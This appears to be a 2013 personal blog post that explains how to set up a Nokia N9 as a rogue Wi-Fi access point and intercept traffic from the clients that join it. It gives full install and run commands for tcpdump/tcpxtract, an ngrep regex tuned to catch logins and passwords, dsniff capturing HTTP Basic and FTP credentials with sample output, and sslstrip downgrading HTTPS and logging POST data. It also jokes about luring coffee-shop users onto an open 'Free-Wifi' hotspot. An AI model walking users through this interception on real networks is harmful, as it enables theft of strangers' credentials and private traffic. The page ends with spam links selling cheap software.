– code is poetry…


the n9 as an evil access point #mitm

01.02.2013 (1:22 am) – Filed under: computing, debian, linux, meego

Prelude: I used it in all these tools for development and privat use, e.g. you shouldn’t use it in a coffee-shop, call your hotspot “Free-Wifi” and turn the encryption off :P

The last month I looked for a way to use my n9 as package sniffer and I figured out some usefull stuff …

… my train of thought was – how can I sniff whatever it’s transmitted through my stock wifi-hotspot (joikuspot) …

… so here’s a guideline of what I got working and how it works:


My device:

Nokia n9, Linux RM 696 open mode, meego Harmattan PR1.3



1. tcpdump + tcpxtract
2. ngrep
3. dsniff [dsniff itself]
4. ssldump?

1. tcpdump + tcpxtract:

tcpdump is a very powerful package analyzer – you can dump nearly all traffic with this tool …

tcpxtract is a tool to rebuild data from tcpdump-pcap files…

let’s install the packages [and dependencies]:

apt-get install tcpdump libpcap0.8

I took the tcpxtract_1.0.1-5_armel package out of the debian repository.

dpkg -i tcpxtract_1.0.1-5_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin:

mkdir tcpxtract_out/
tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

# we are starting tcpdump on interface [-i] wlan0, set the snaplen to 1500 [-s], don’t convert addresses to names [-n] and listen only on port 80 [port 80]

open a website on the client … tcpdump will capture it.

when you think you are finished, kill tcpdump [crtl+c]

now we will convert the captured traffic:

/home/user/dev/tcpplay # tcpxtract -f tcpdump_http.pcap -o tcpxtract_out/

Found file of type “html” in session [ ->], exporting to tcpxtract_out/00000000.html
Found file of type “png” in session [ ->], exporting to tcpxtract_out/00000001.png
Found file of type “png” in session [ ->], exporting to tcpxtract_out/00000002.png
Found file of type “png” in session [ ->], exporting to tcpxtract_out/00000003.png

Found file of type “png” in session [ ->], exporting to tcpxtract_out/00000021.png

it looks like this.

I LIKE! :)

2. ngrep

ngrep is a very powerful tool as well – you can analyze traffic live…

I’m going to show you how to filter the traffic by some regular expressions to look for logins:

first install the necessary dependencies and ngrep itself:

apt-get install lipcap0.8

here’s ngrep_1.45.ds2-9_armel [from debian repository]

dpkg -i ngrep ngrep_1.45.ds2-9_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin [again ;) ]:

/home/user/dev/sniffer # ngrep ‘[&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)’ -q -i -d gprs0 port 80 or port 25 or port 110 -l
interface: gprs0 (
filter: (ip or ip6) and ( port 80 or port 25 or port 110 )
match: [&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)

T -> [AP]

# we are starting ngrep with a regular expression filter, tell it to be quiet [-q], to ignore case [-i], to use interface gprs0 [-d] (i had segment faults when I started it on wlan0 … from time to time), -l to make the stdout line buffered [-l] (usefull when capturing to a file {2>&1 >ngrep.log}) and filter the traffic by ports [port 80 or port 25 or port 110]

… What it doesn’t do is capturing htaccess logins, I use dsniff for it.

3. dsniff

dsniff? – omg, it’s awesome! it includes:

arpspoof  – Send out unrequested (and possibly forged) arp replies.
dnsspoof  – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
dsniff    – password sniffer for several protocols.
filesnarf – saves selected files sniffed from NFS traffic.
macof     – flood the local network with random MAC addresses.
mailsnarf – sniffs mail on the LAN and stores it in mbox format.
msgsnarf  – record selected messages from different Instant Messengers.
sshmitm   – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow     – SSH traffic analyser.
tcpkill   – kills specified in-progress TCP connections.
tcpnice   – slow down specified TCP connections via “active” traffic shaping.
urlsnarf  – output selected URLs sniffed from HTTP traffic in CLF.
webmitm   – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy    – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

dsniff does have some more dependencies than the other tools I described:

I took the libdb4.6_4.6.21-16_armel and libnids1.21_1.23-2_armel from the debian repository.

Here’s dsniff_2.4b1+debian-18_armel

apt-get install libnet1 libpcap0.8 libssl0.9.8 openssl

dpkg -i libdb4.6_4.6.21-16_armel.deb

dpkg -i libnids1.21_1.23-2_armel.deb

dpkg -i dsniff_2.4b1+debian-18_armel.deb

whooop! – should be working now :)

dsniff itself is very simple to use – it has a build-in filter. I used it to sniff the authentication for htaccess logins as well as ftp logins:

/home/user/dev/sniffer # dsniff -m -s 1500 -i gprs0
dsniff: listening on gprs0

01/31/13 10:45:02 tcp -> (http)
GET / HTTP/1.0
authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA== [thisis:htaccessdump]

01/31/13 10:47:22 tcp -> (ftp)
USER thisis
PASS ftpdump

# we are starting dsniff with automatic protocol detection [-m], set the snaplen to 1500 [-s] and listen on interface gprs0 [-i] … again I got segment faults when listening on wlan0.

4. sslstrip?

sslstrip strips down your https connections to http …

… I found a way to pipe your local connection through sslstrip, but not with the hotspot connected client.

All I did was to modify my APN connection – I activated the http_proxy on and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode “manual”) – deactivate and activate the connection again and fire up sslstrip.

An alternative for testing is to set the http proxy in firefox.

What I figured out was: The Joikuspot doesn’t use the APN entry from the phone settings, because I tried to add a second APN with some changed settings and it won’t show up in the properties of Joikuspot. – Maybe that’s why it doesn’t take the proxy settings from the APN … anyway, I’m still working on a workaround!

Here’s sslstrip-0.9 (taken from

/home/user/dev/sniffer/# apt-get install python-twisted-web

/home/user/dev/sniffer # tar xzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

/home/user/dev/sniffer/sslstrip-0.9 # python build
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # python install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # ln -s /usr/local/bin/sslstrip /usr/bin/

/home/user/dev/sniffer/sslstrip-0.9 # gconftool-2 -t string -s /system/proxy/mode “manual”

/home/user/dev/sniffer/sslstrip-0.9 # sslstrip -l 10000 -w ../sslstrip.log &

/home/user/dev/sniffer/sslstrip-0.9 # tail -f ../sslstrip.log

2013-01-31 23:57:56,683 SECURE POST Data (

… I also got the webmitm/mitmproxy running (fakes SSL-certifications, but as it’s not a very efficient and elegant way to work, so I won’t explain it)


One Response to “the n9 as an evil access point #mitm”

  1. sds Says:

    when i type this code in terminal:

    tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80


    sh: tcpdump: not found

    but in installing of tcpdump and libpcap0.8


    you have installed latest version of tcpdump and libpcap0.8 !!!

    Can u learn this post step by step,plzzzzzzzzzzzzzzzz?

Leave a Comment
(All comments are moderated before they appear on the site.)

buy autodesk revit 2015 buy adobe after effects cc buy corel pdf fusion buy rosetta stone dutch buy autodesk autocad mechanical 2014 buy adobe dreamweaver cs5 buy microsoft onenote 2010 buy microsoft office 2013 professional buy adobe captivate 5 buy autodesk 3ds max 2013